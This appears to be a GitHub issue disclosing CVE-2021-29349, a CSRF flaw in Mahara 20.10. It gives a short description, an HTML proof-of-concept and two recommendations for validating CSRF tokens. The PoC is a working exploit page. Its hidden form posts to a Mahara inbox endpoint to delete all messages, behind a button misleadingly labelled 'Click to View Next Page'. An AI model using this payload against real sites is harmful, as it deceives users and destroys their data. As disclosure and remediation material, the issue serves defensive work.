Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-29349 #1

Open
0xBaz opened this issue Mar 31, 2021 · 0 comments
Open

CVE-2021-29349 #1

0xBaz opened this issue Mar 31, 2021 · 0 comments

Comments

@0xBaz
Copy link
Owner

0xBaz commented Mar 31, 2021

Product : Mahara 20.10

Description: Cross Site Request Forgery (CSRF) that
allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft the /inbox.php directory, which leads to removing all messages from a mailbox.

Video POC : Google Drive Video

POC :

/* Email Box Exploit - CSRF  */

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
  height: 100%;
  margin: 0;
}

.bg {
  /* The image used */
  background-image: url("https://avatars.githubusercontent.com/u/78818477?s=400&u=b18f9de63b3df28e6e1b4d2dc64303048aa5f5b5&v=4");

  /* Full height */
  height: 100%; 

  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}
</style>
</head>
<body>

<div class="bg"></div>

<p>CSRF CVE-2021-29349 , After clicking below button all inbox maill messages will be deleted  !!.</p>

</body>

<form enctype="multipart/form-data" method="POST" action="https://demo.mahara.org/module/multirecipientnotification/inbox.php"><table><input type hidden="text" value="Delete+all+notifications" name="submit">
<input type hidden="text" value="all" name="type">
<input type hidden="text" value="L8T0C4WDuMxzakwV" name="sesskey">
<input type hidden="text" value="" name="pieform_delete_all_notifications">
</table><input type="submit" value="Click to View Next Page"></form>
</html>

Recommendations :

1- Implement X-CSRF-TOKEN and make sure it's validating in back-end server as well
2- Implement an interceptor which appends token value to every (state-changing) request in custom request header X-XSRF-TOKEN-B

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant